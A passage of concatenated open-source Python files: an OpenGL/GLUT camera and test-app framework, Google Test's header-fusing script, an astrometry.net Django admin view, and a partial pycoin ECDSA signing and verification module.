glutKeyboardFunc(self.keypress_callback)
glutKeyboardUpFunc(self.keyrelease_callback)
glutMouseFunc(self.mouse_callback)
glutMotionFunc(self.motion_callback)
glutDisplayFunc(self.display_callback)
glutIdleFunc(self.idle_callback)
glutIgnoreKeyRepeat(True)
glutMainLoop()
return
#f display_callback
def display_callback(self):
if (not self.display_has_errored):
try:
self.display()
except SystemExit as e:
raise
except:
traceback.print_exc()
self.display_has_errored = True
pass
pass
pass
#f keypress_callback
def keypress_callback(self, key,x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
        y = h-y # Invert y as OpenGL wants it measured from the bottom-left
m = glutGetModifiers()
if self.keypress(key,m,x,y):
return
if ord(key)==17: # ctrl-Q
sys.exit()
pass
#f keyrelease_callback
def keyrelease_callback(self, key,x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
        y = h-y # Invert y as OpenGL wants it measured from the bottom-left
m = glutGetModifiers()
if self.keyrelease(key,m,x,y):
return
if ord(key)==17: # ctrl-Q
sys.exit()
pass
#f mouse_callback
def mouse_callback(self, button,state,x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
        y = h-y # Invert y as OpenGL wants it measured from the bottom-left
m = glutGetModifiers()
b = "left"
s = "up"
if state == GLUT_UP: s="up"
if state == GLUT_DOWN: s="down"
if button == GLUT_LEFT_BUTTON: b="left"
if button == GLUT_MIDDLE_BUTTON: b="middle"
if button == GLUT_RIGHT_BUTTON: b="right"
self.mouse(b,s,m,x,y)
pass
#f motion_callback
def motion_callback(self, x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
        y = h-y # Invert y as OpenGL wants it measured from the bottom-left
self.motion(x,y)
pass
#f idle_callback
def idle_callback(self):
self.idle()
glutPostRedisplay()
pass
#f display
def display(self):
"""
Should be provided by the subclass
"""
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
glutSwapBuffers()
pass
#f keypress
def keypress(self, k, m, x, y):
"""
Should be provided by the subclass
"""
pass
#f keyrelease
def keyrelease(self, k, m, x, y):
"""
Should be provided by the subclass
"""
pass
#f mouse
def mouse(self, b, s, m, x, y):
"""
Should be provided by the subclass
"""
pass
#f motion
def motion(self, x, y):
"""
Should be provided by the subclass
"""
pass
#f idle
def idle(self):
"""
Should be provided by the subclass
"""
pass
#f get_font
def get_font(self, fontname):
if fontname not in self.fonts:
fontname = self.fonts.keys()[0]
pass
return self.fonts[fontname]
#f load_font
def load_font(self, bitmap_filename):
import numpy
from gjslib.graphics.font import c_bitmap_font
bf = c_bitmap_font()
bf.load(bitmap_filename)
png_data = numpy.array(list(bf.image.getdata()), numpy.uint8)
texture = glGenTextures(1)
glPixelStorei(GL_UNPACK_ALIGNMENT,1)
glBindTexture(GL_TEXTURE_2D, texture)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_MIRRORED_REPEAT)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_MIRRORED_REPEAT)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexImage2D(GL_TEXTURE_2D, 0, GL_R8, bf.image_size[0], bf.image_size[1], 0, GL_RED, GL_UNSIGNED_BYTE, png_data)
glFlush()
self.fonts[bf.fontname] = (bf, texture)
return bf
#f debug
def debug(self, reason, options=None):
print "*"*80
print "opengl_app.debug",reason
print "*"*80
print self.clips
print self.display_matrices["project"][-1]
print self.display_matrices["view"][-1]
print self.display_matrices["model"][-1]
pass
#f All done
pass
#c c_opengl_camera_app
class c_opengl_camera_app(c_opengl_app):
camera_control_keys = { "x":(("roll",1,0),),
"z":(("roll",2,0),),
"s":(("pitch",1,0),),
"a":(("pitch",2,0),),
".":(("yaw",1,0),),
";":(("yaw",2,0),),
"[":(("fov",1,0),),
"]":(("fov",2,0),),
"/":(("speed",1,0),),
"'":(("speed",2,0),),
" ":(("roll",0,-1),("yaw",0,-1),("pitch",0,-1),("speed",4,3),),
}
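    # Each entry maps a key to (action, set_bits, clear_bits) tuples; idle()
    # ORs the bits of all currently held keys per action, masks set against
    # clear, and then either applies the matching quaternion from camera_quats
    # (roll/pitch/yaw) or adjusts speed/fov from the resulting control value.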
#f __init__
def __init__(self, **kwargs):
c_opengl_app.__init__(self, **kwargs)
self.camera = {"position":[0,0,-10],
"facing":quaternion.c_quaternion.identity(),
"rpy":[0,0,0],
"speed":0,
"fov":90,
}
self.mvp = None
self.aspect = 1.0
self.zNear=1.0
self.zFar=40.0
self.camera_controls = set()
self.camera_quats = {("roll",1):quaternion.c_quaternion.roll(+0.002),
("roll",2):quaternion.c_quaternion.roll(-0.002),
("yaw",1):quaternion.c_quaternion.yaw(+0.002),
("yaw",2):quaternion.c_quaternion.yaw(-0.002),
("pitch",1):quaternion.c_quaternion.pitch(+0.002),
("pitch",2):quaternion.c_quaternion.pitch(-0.002),
}
pass
#f set_camera
def set_camera(self, camera=None, orientation=None, yfov=None):
if camera is not None:
self.camera["position"] = list(camera)
pass
if orientation is not None:
self.camera["facing"] = orientation
pass
if yfov is not None:
self.camera["fov"] = yfov
pass
#f change_angle
def change_angle(self, angle, dirn, angle_delta=0.01 ):
if (self.camera["rpy"][angle]*dirn)<0:
self.camera["rpy"][angle]=0
pass
else:
self.camera["rpy"][angle] += dirn*angle_delta
pass
pass
#f change_position
def change_position(self, x,y,z ):
scale = 0.1+self.camera["speed"]*5
self.camera["position"] = [self.camera["position"][0]+x*scale,
self.camera["position"][1]+y*scale,
self.camera["position"][2]+z*scale
]
pass
#f change_fov
def change_fov(self, fov):
self.camera["fov"] += fov
if self.camera["fov"]<10: self.camera["fov"]=10
if self.camera["fov"]>140: self.camera["fov"]=140
pass
#f idle
def idle(self):
acceleration = 0.02
self.camera["speed"] = self.camera["speed"]*0.9
actions = {}
for c in self.camera_controls:
for action in self.camera_control_keys[c]:
(a,s,c) = action
if a in actions:
s = s | actions[a][0]
c = c | actions[a][1]
pass
actions[a] = (s,c)
pass
pass
for a in actions:
(s,c) = actions[a]
controls = s &~ c
if controls!=0:
if (a,controls) in self.camera_quats:
self.camera["facing"] = self.camera_quats[(a,controls)].copy().multiply(self.camera["facing"])
elif a=="speed":
self.camera["speed"] += acceleration*(2*controls-3)
if controls&4: self.camera["speed"]=0
elif a=="fov":
self.camera["fov"] *= 1+0.1*(2*controls-3)
pass
pass
if self.camera["speed"]!=0:
m = self.camera["facing"].get_matrix()
self.camera["position"][0] += self.camera["speed"]*m[0][2]
self.camera["position"][1] += self.camera["speed"]*m[1][2]
self.camera["position"][2] += self.camera["speed"]*m[2][2]
pass
pass
#f key_updown
def key_updown(self, key,m,x,y,key_down):
if key in self.camera_control_keys:
if key_down:
self.camera_controls.add(key)
pass
else:
self.camera_controls.discard(key)
pass
return True
pass
#f keyrelease
def keyrelease(self, key,m,x,y):
if self.key_updown(key,m,x,y,False):
return
pass
#f keypress
def keypress(self, key,m,x,y):
if self.key_updown(key,m,x,y,True):
return
if key==' ': self.camera["speed"] = 0
if key=='e': self.camera["rpy"] = [0,0,0]
if key=='r': self.camera["position"] = [0,0,-10]
if key=='r': self.camera["facing"] = quaternion.c_quaternion.identity()
if key=='r': self.camera["fov"] = 90
pass
#f opengl_post_init
def opengl_post_init(self):
pass
#f display
def display(self, show_crosshairs=False, focus_xxyyzz=None):
self.matrix_perspective(fovy=self.camera["fov"], aspect=self.aspect, zNear=self.zNear, zFar=self.zFar, matrix="project")
if self.mvp is not None:
self.mvp.perspective(self.camera["fov"],self.aspect,self.zNear,self.zFar)
pass
self.camera["facing"] = quaternion.c_quaternion.roll(self.camera["rpy"][0]).multiply(self.camera["facing"])
self.camera["facing"] = quaternion.c_quaternion.pitch(self.camera["rpy"][1]).multiply(self.camera["facing"])
self.camera["facing"] = quaternion.c_quaternion.yaw(self.camera["rpy"][2]).multiply(self.camera["facing"])
m = self.camera["facing"].get_matrixn(order=4)
self.camera["position"][0] += self.camera["speed"]*m[0,2]
self.camera["position"][1] += self.camera["speed"]*m[1,2]
self.camera["position"][2] += self.camera["speed"]*m[2,2]
if focus_xxyyzz is not None:
m2 = m.copy()
#m2.transpose()
#self.camera["position"] = vectors.vector_add((0,-1,0),m2.apply((0,0,-10,1))[0:3])
self.camera["position"] = vectors.vector_add((focus_xxyyzz[0],focus_xxyyzz[2],focus_xxyyzz[4]),
m2.apply((focus_xxyyzz[1],focus_xxyyzz[3],focus_xxyyzz[5],1))[0:3])
pass
self.matrix_set(m.transpose(), matrix="view")
self.matrix_translate(self.camera["position"], matrix="view")
self.matrix_identity(matrix="model")
if self.mvp is not None:
m3 = self.camera["facing"].get_matrix3()
self.mvp.mult3x3(m9=m3.matrix)
self.mvp.translate(self.camera["position"])
pass
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
if show_crosshairs: # Draw crosshairs
self.matrix_push("project")
self.matrix_push("view")
self.matrix_push("model")
self.matrix_identity("project")
self.matrix_identity("view")
self.matrix_identity("model")
self.shader_use("color_standard")
self.shader_set_attributes(C=(0.7,0.7,0.9))
self.matrix_use()
self.draw_lines((-1,0,-1,1,0,-1, 0,-1,-1,0,1,-1))
self.matrix_pop("project")
self.matrix_pop("view")
self.matrix_pop("model")
pass
pass
#f All done
pass
#a Test app
class c_opengl_test_app(c_opengl_camera_app):
use_primitive_restart = False
patches = { "flat_xy_square": ( (0,0,0), (1/3.0,0,0), (2/3.0,0,0), (1,0,0),
(0,1/3.0,0), (1/3.0,1/3.0,0), (2/3.0,1/3.0,0), (1,1/3.0,0),
(0,2/3.0,0), (1/3.0,2/3.0,0), (2/3.0,2/3.0,0), (1,2/3.0,0),
(0,1,0), (1/3.0,1,0), (2/3.0,1,0), (1,1,0),
),
"bump_one": ( (0,0,0), (0.1,0,0.1), (0.9,0,0.1), (1,0,0),
(0,0.1,0.1), (0.1,0.1,0.1), (0.9,0.1,0.1), (1,0.1,0.1),
(0,0.9,0.1), (0.1,0.9,0.1), (0.9,0.9,0.1), (1,0.9,0.1),
(0,1,0), (0.1,1,0.1), (0.9,1,0.1), (1,1,0),
),
"bump_two": ( (0,0,0), (0.2,-0.2,0.2), (0.8,-0.2,0.2), (1,0,0),
(-0.2,0.2,0.2), (0.2,0.2,-0.1), (0.8,0.2,-0.1), (1.2,0.2,0.2),
(-0.2,0.8,0.2), (0.2,0.8,-0.1), (0.8,0.8,-0.1), (1.2,0.8,0.2),
(0,1,0), (0.2,1.2,0.2), (0.8,1.2,0.2), (1,1,0),
),
}
#f __init__
def __init__(self, patch_name, **kwargs):
c_opengl_camera_app.__init__(self, **kwargs)
self.patch = self.patches[patch_name]
self.opengl_surface = {}
self.xxx = 0.0
self.yyy = 0.0
self.window_title = "OpenGL Test app '%s'"%patch_name
pass
#f opengl_post_init
def opengl_post_init(self):
from gjslib.math import bezier
from ctypes import sizeof, c_float, c_void_p, c_uint
pts = []
for coords in self.patch:
pts.append( bezier.c_point(coords=coords) )
pass
bp = bezier.c_bezier_patch( pts=pts )
float_size = sizeof(c_float)
vertex_offset = c_void_p(0 * float_size)
normal_offset = c_void_p(3 * float_size)
record_len = 6 * float_size
data_array = []
n = 14
for i in range(n+1):
for j in range(n+1):
data_array.append( bp.coord(i/(n+0.0),j/(n+0.0)).get_coords(scale=(2.0,2.0,2.0),offset=(-1.,-1.0,.0)) )
data_array.append( bp.normal(i/(n+0.0),j/(n+0.0)).get_coords() )
pass
pass
vertices = vbo.VBO( data=numpy.array(data_array, dtype=numpy.float32) )
index_list = []
if self.use_primitive_restart:
glEnable(GL_PRIMITIVE_RESTART)
pass
for j in range(n):
for i in range(n+1):
index_list.append( i+j*(n+1) )
index_list.append( i+(j+1)*(n+1) )
pass
if j<(n-1):
if self.use_primitive_restart:
index_list.append( 255 )
pass
else:
index_list.append( (n)+(j+1)*(n+1) )
index_list.append( (n)+(j+1)*(n+1) )
index_list.append( (j+1)*(n+1) )
index_list.append( (j+1)*(n+1) )
pass
pass
print index_list
indices = vbo.VBO( data=numpy.array( index_list, dtype=numpy.uint8),
target=GL_ELEMENT_ARRAY_BUFFER )
vertices.bind()
indices.bind()
self.opengl_surface["vertices"] = vertices
self.opengl_surface["indices"] = indices
self.opengl_surface["vertex_offset"] = vertex_offset
self.opengl_surface["normal_offset"] = normal_offset
self.opengl_surface["record_len"] = record_len
pass
#f display
def display(self):
c_opengl_camera_app.display(self)
self.yyy += 0.03
lightZeroPosition = [4.+3*math.sin(self.yyy),4.,4.-3*math.cos(self.yyy),1.]
        lightZeroColor = [0.7,1.0,0.7,1.0] # green-tinged diffuse
        ambient_lightZeroColor = [1.0,1.0,1.0,1.0] # white ambient
glLightfv(GL_LIGHT0, GL_POSITION, lightZeroPosition)
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightZeroColor)
glLightf(GL_LIGHT0, GL_CONSTANT_ATTENUATION, 0.1)
glLightf(GL_LIGHT0, GL_LINEAR_ATTENUATION, 0.05)
glEnable(GL_LIGHT0)
glLightfv(GL_LIGHT1, GL_AMBIENT, ambient_lightZeroColor)
glEnable(GL_LIGHT1)
glPushMatrix()
color = [1.0,0.,0.,1.]
glMaterialfv(GL_FRONT,GL_DIFFUSE,[1.0,1.0,1.0,1.0])
glMaterialfv(GL_FRONT,GL_AMBIENT,[1.0,1.0,1.0,1.0])
glTranslate(lightZeroPosition[0],lightZeroPosition[1],lightZeroPosition[2])
glScale(0.3,0.3,0.3)
glutSolidSphere(2,40,40)
glPopMatrix()
glMaterialfv(GL_FRONT,GL_AMBIENT,[0.1,0.1,0.1,1.0])
glPushMatrix()
#glTranslate(0.0 ,2.75, 0.0)
        color = [0.5, 0., 0., 1.]
glMaterialfv(GL_FRONT,GL_DIFFUSE,color)
#glutSolidSphere(2,40,40)
glutSolidOctahedron()
glPopMatrix()
glPushMatrix()
self.xxx += 0.3
brightness = 0.4
glRotate(self.xxx,1,1,0)
glTranslate(0.0 ,-0.75, 0.0)
glMaterialfv(GL_FRONT,GL_DIFFUSE,[brightness*1.0,brightness*1.,brightness*0.,1.])
glPushMatrix()
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPushMatrix()
glRotate(180,0,1,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glMaterialfv(GL_FRONT,GL_DIFFUSE,[brightness*0.5,brightness*1.,brightness*0.,1.])
glPushMatrix()
glRotate(-90,0,1,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPushMatrix()
glRotate(90,0,1,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glMaterialfv(GL_FRONT,GL_DIFFUSE,[brightness*0,brightness*0.5,brightness*0.5,1.])
glPushMatrix()
glRotate(-90,1,0,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPushMatrix()
glRotate(90,1,0,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPopMatrix()
glutSwapBuffers()
pass
#f draw_object
def draw_object(self):
self.opengl_surface["vertices"].bind()
        glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_NORMAL_ARRAY)
glVertexPointer( 3, GL_FLOAT, self.opengl_surface["record_len"], self.opengl_surface["vertex_offset"] )
glNormalPointer( GL_FLOAT, self.opengl_surface["record_len"], self.opengl_surface["normal_offset"])
self.opengl_surface["indices"].bind()
glDrawElements( GL_TRIANGLE_STRIP,
len(self.opengl_surface["indices"]),
GL_UNSIGNED_BYTE,
self.opengl_surface["indices"] )
pass
#f All done
pass
#a Toplevel
if __name__ == '__main__':
a = c_opengl_test_app(patch_name="bump_one", window_size=(1000,1000))
a.init_opengl()
a.main_loop()
pass
| apache-2.0 |
EvgeneOskin/oce | test/gtest-1.7.0/scripts/fuse_gtest_files.py | 2577 | 8813 | #!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""fuse_gtest_files.py v0.2.0
Fuses Google Test source code into a .h file and a .cc file.
SYNOPSIS
fuse_gtest_files.py [GTEST_ROOT_DIR] OUTPUT_DIR
Scans GTEST_ROOT_DIR for Google Test source code, and generates
two files: OUTPUT_DIR/gtest/gtest.h and OUTPUT_DIR/gtest/gtest-all.cc.
Then you can build your tests by adding OUTPUT_DIR to the include
search path and linking with OUTPUT_DIR/gtest/gtest-all.cc. These
two files contain everything you need to use Google Test. Hence
you can "install" Google Test by copying them to wherever you want.
GTEST_ROOT_DIR can be omitted and defaults to the parent
directory of the directory holding this script.
EXAMPLES
./fuse_gtest_files.py fused_gtest
./fuse_gtest_files.py path/to/unpacked/gtest fused_gtest
This tool is experimental. In particular, it assumes that there is no
conditional inclusion of Google Test headers. Please report any
problems to googletestframework@googlegroups.com. You can read
http://code.google.com/p/googletest/wiki/GoogleTestAdvancedGuide for
more information.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sets
import sys
# We assume that this file is in the scripts/ directory in the Google
# Test root directory.
DEFAULT_GTEST_ROOT_DIR = os.path.join(os.path.dirname(__file__), '..')
# Regex for matching '#include "gtest/..."'.
INCLUDE_GTEST_FILE_REGEX = re.compile(r'^\s*#\s*include\s*"(gtest/.+)"')
# Regex for matching '#include "src/..."'.
INCLUDE_SRC_FILE_REGEX = re.compile(r'^\s*#\s*include\s*"(src/.+)"')
# Where to find the source seed files.
GTEST_H_SEED = 'include/gtest/gtest.h'
GTEST_SPI_H_SEED = 'include/gtest/gtest-spi.h'
GTEST_ALL_CC_SEED = 'src/gtest-all.cc'
# Where to put the generated files.
GTEST_H_OUTPUT = 'gtest/gtest.h'
GTEST_ALL_CC_OUTPUT = 'gtest/gtest-all.cc'
def VerifyFileExists(directory, relative_path):
"""Verifies that the given file exists; aborts on failure.
relative_path is the file path relative to the given directory.
"""
if not os.path.isfile(os.path.join(directory, relative_path)):
print 'ERROR: Cannot find %s in directory %s.' % (relative_path,
directory)
print ('Please either specify a valid project root directory '
'or omit it on the command line.')
sys.exit(1)
def ValidateGTestRootDir(gtest_root):
"""Makes sure gtest_root points to a valid gtest root directory.
The function aborts the program on failure.
"""
VerifyFileExists(gtest_root, GTEST_H_SEED)
VerifyFileExists(gtest_root, GTEST_ALL_CC_SEED)
def VerifyOutputFile(output_dir, relative_path):
"""Verifies that the given output file path is valid.
relative_path is relative to the output_dir directory.
"""
# Makes sure the output file either doesn't exist or can be overwritten.
output_file = os.path.join(output_dir, relative_path)
if os.path.exists(output_file):
# TODO(wan@google.com): The following user-interaction doesn't
# work with automated processes. We should provide a way for the
# Makefile to force overwriting the files.
print ('%s already exists in directory %s - overwrite it? (y/N) ' %
(relative_path, output_dir))
answer = sys.stdin.readline().strip()
if answer not in ['y', 'Y']:
print 'ABORTED.'
sys.exit(1)
# Makes sure the directory holding the output file exists; creates
# it and all its ancestors if necessary.
parent_directory = os.path.dirname(output_file)
if not os.path.isdir(parent_directory):
os.makedirs(parent_directory)
def ValidateOutputDir(output_dir):
"""Makes sure output_dir points to a valid output directory.
The function aborts the program on failure.
"""
VerifyOutputFile(output_dir, GTEST_H_OUTPUT)
VerifyOutputFile(output_dir, GTEST_ALL_CC_OUTPUT)
def FuseGTestH(gtest_root, output_dir):
"""Scans folder gtest_root to generate gtest/gtest.h in output_dir."""
output_file = file(os.path.join(output_dir, GTEST_H_OUTPUT), 'w')
processed_files = sets.Set() # Holds all gtest headers we've processed.
def ProcessFile(gtest_header_path):
"""Processes the given gtest header file."""
# We don't process the same header twice.
if gtest_header_path in processed_files:
return
processed_files.add(gtest_header_path)
# Reads each line in the given gtest header.
for line in file(os.path.join(gtest_root, gtest_header_path), 'r'):
m = INCLUDE_GTEST_FILE_REGEX.match(line)
if m:
# It's '#include "gtest/..."' - let's process it recursively.
ProcessFile('include/' + m.group(1))
else:
# Otherwise we copy the line unchanged to the output file.
output_file.write(line)
ProcessFile(GTEST_H_SEED)
output_file.close()
def FuseGTestAllCcToFile(gtest_root, output_file):
"""Scans folder gtest_root to generate gtest/gtest-all.cc in output_file."""
processed_files = sets.Set()
def ProcessFile(gtest_source_file):
"""Processes the given gtest source file."""
# We don't process the same #included file twice.
if gtest_source_file in processed_files:
return
processed_files.add(gtest_source_file)
# Reads each line in the given gtest source file.
for line in file(os.path.join(gtest_root, gtest_source_file), 'r'):
m = INCLUDE_GTEST_FILE_REGEX.match(line)
if m:
if 'include/' + m.group(1) == GTEST_SPI_H_SEED:
# It's '#include "gtest/gtest-spi.h"'. This file is not
# #included by "gtest/gtest.h", so we need to process it.
ProcessFile(GTEST_SPI_H_SEED)
else:
# It's '#include "gtest/foo.h"' where foo is not gtest-spi.
# We treat it as '#include "gtest/gtest.h"', as all other
# gtest headers are being fused into gtest.h and cannot be
# #included directly.
# There is no need to #include "gtest/gtest.h" more than once.
if not GTEST_H_SEED in processed_files:
processed_files.add(GTEST_H_SEED)
output_file.write('#include "%s"\n' % (GTEST_H_OUTPUT,))
else:
m = INCLUDE_SRC_FILE_REGEX.match(line)
if m:
# It's '#include "src/foo"' - let's process it recursively.
ProcessFile(m.group(1))
else:
output_file.write(line)
ProcessFile(GTEST_ALL_CC_SEED)
def FuseGTestAllCc(gtest_root, output_dir):
"""Scans folder gtest_root to generate gtest/gtest-all.cc in output_dir."""
output_file = file(os.path.join(output_dir, GTEST_ALL_CC_OUTPUT), 'w')
FuseGTestAllCcToFile(gtest_root, output_file)
output_file.close()
def FuseGTest(gtest_root, output_dir):
"""Fuses gtest.h and gtest-all.cc."""
ValidateGTestRootDir(gtest_root)
ValidateOutputDir(output_dir)
FuseGTestH(gtest_root, output_dir)
FuseGTestAllCc(gtest_root, output_dir)
def main():
argc = len(sys.argv)
if argc == 2:
# fuse_gtest_files.py OUTPUT_DIR
FuseGTest(DEFAULT_GTEST_ROOT_DIR, sys.argv[1])
elif argc == 3:
# fuse_gtest_files.py GTEST_ROOT_DIR OUTPUT_DIR
FuseGTest(sys.argv[1], sys.argv[2])
else:
print __doc__
sys.exit(1)
if __name__ == '__main__':
main()
| lgpl-2.1 |
olebole/astrometry.net | net/views/admin.py | 2 | 1403 |
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest, QueryDict
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template import Context, RequestContext, loader
from django.contrib.auth.decorators import login_required
from astrometry.net.models import *
from astrometry.net import settings
from astrometry.net.log import *
from astrometry.net.tmpfile import *
def index(req):
ps = ProcessSubmissions.objects.all().order_by('-watchdog')
logmsg('ProcessSubmissions:', ps)
return render_to_response('admin.html',
{ 'procsubs':ps,
},
context_instance = RequestContext(req))
def procsub(req, psid=None):
ps = get_object_or_404(ProcessSubmissions, pk=psid)
logmsg('ProcessSubmission:', ps)
logmsg('jobs:', ps.jobs.all())
for j in ps.jobs.all():
logmsg(' ', j)
logmsg(' ', j.job)
logmsg(' ', j.job.user_image)
logmsg(' ', j.job.user_image.submission)
now = datetime.now()
now = now.replace(microsecond=0)
now = now.isoformat()
return render_to_response('procsub.html',
{ 'procsub':ps,
'now':now,
},
context_instance = RequestContext(req))
| bsd-3-clause |
thirdkey-solutions/pycoin | pycoin/ecdsa/ecdsa.py | 20 | 6140 |
"""
Some portions adapted from https://github.com/warner/python-ecdsa/ Copyright (c) 2010 Brian Warner
who granted its use under this license:
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
Portions written in 2005 by Peter Pearson and placed in the public domain.
"""
import hashlib
import hmac
from .. import intbytes
from . import ellipticcurve, numbertheory
if hasattr(1, "bit_length"):
bit_length = lambda v: v.bit_length()
else:
def bit_length(self):
# Make this library compatible with python < 2.7
# https://docs.python.org/3.5/library/stdtypes.html#int.bit_length
s = bin(self) # binary representation: bin(-37) --> '-0b100101'
s = s.lstrip('-0b') # remove leading zeros and minus sign
return len(s) # len('100101') --> 6
def deterministic_generate_k(generator_order, secret_exponent, val, hash_f=hashlib.sha256):
"""
Generate K value according to https://tools.ietf.org/html/rfc6979
"""
n = generator_order
order_size = (bit_length(n) + 7) // 8
hash_size = hash_f().digest_size
v = b'\x01' * hash_size
k = b'\x00' * hash_size
priv = intbytes.to_bytes(secret_exponent, length=order_size)
shift = 8 * hash_size - bit_length(n)
if shift > 0:
val >>= shift
if val > n:
val -= n
h1 = intbytes.to_bytes(val, length=order_size)
k = hmac.new(k, v + b'\x00' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
k = hmac.new(k, v + b'\x01' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
while 1:
t = bytearray()
while len(t) < order_size:
v = hmac.new(k, v, hash_f).digest()
t.extend(v)
k1 = intbytes.from_bytes(bytes(t))
k1 >>= (len(t)*8 - bit_length(n))
if k1 >= 1 and k1 < n:
return k1
k = hmac.new(k, v + b'\x00', hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
def sign(generator, secret_exponent, val):
"""Return a signature for the provided hash, using the provided
random nonce. It is absolutely vital that random_k be an unpredictable
number in the range [1, self.public_key.point.order()-1]. If
an attacker can guess random_k, he can compute our private key from a
single signature. Also, if an attacker knows a few high-order
bits (or a few low-order bits) of random_k, he can compute our private
key from many signatures. The generation of nonces with adequate
cryptographic strength is very difficult and far beyond the scope
of this comment.
May raise RuntimeError, in which case retrying with a new
random value k is in order.
"""
G = generator
n = G.order()
k = deterministic_generate_k(n, secret_exponent, val)
p1 = k * G
r = p1.x()
if r == 0: raise RuntimeError("amazingly unlucky random number r")
s = ( numbertheory.inverse_mod( k, n ) * \
( val + ( secret_exponent * r ) % n ) ) % n
if s == 0: raise RuntimeError("amazingly unlucky random number s")
return (r, s)
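# A hedged usage sketch (not part of the original module), assuming a
# secp256k1 generator object is importable roughly as shown (the exact
# import path is an assumption here):
#   from pycoin.ecdsa import generator_secp256k1 as G
#   val = intbytes.from_bytes(hashlib.sha256(b"message").digest())
#   r, s = sign(G, secret_exponent=0x1234, val=val)
#   assert verify(G, public_pair_for_secret_exponent(G, 0x1234), val, (r, s))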
def public_pair_for_secret_exponent(generator, secret_exponent):
return (generator*secret_exponent).pair()
def public_pair_for_x(generator, x, is_even):
curve = generator.curve()
p = curve.p()
alpha = ( pow(x, 3, p) + curve.a() * x + curve.b() ) % p
beta = numbertheory.modular_sqrt(alpha, p)
if is_even == bool(beta & 1):
return (x, p - beta)
return (x, beta)
def is_public_pair_valid(generator, public_pair):
return generator.curve().contains_point(public_pair[0], public_pair[1])
def verify(generator, public_pair, val, signature):
"""
Verify that signature is a valid signature of hash.
Return True if the signature is valid.
"""
# From X9.62 J.3.1.
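    # With c = s^-1 mod n, u1 = val*c and u2 = r*c, the signature is valid
    # exactly when the x-coordinate of u1*G + u2*Q is congruent to r mod n.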
G = generator
n = G.order()
r, s = signature
if r < 1 or r > n-1: return False
if s < 1 or s > n-1: return False
c = numbertheory.inverse_mod( s, n )
u1 = ( val * c ) % n
u2 = ( r * c ) % n
point = u1 * G + u2 * ellipticcurve.Point( G.curve(), public_pair[0], public_pair[1], G.order() )
v = point.x() % n
return v == r
def possible_public_pairs_for_signature(generator, value, signature):
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf for the math """
G = generator
curve = G.curve()
order = G.order()
p = curve.p()
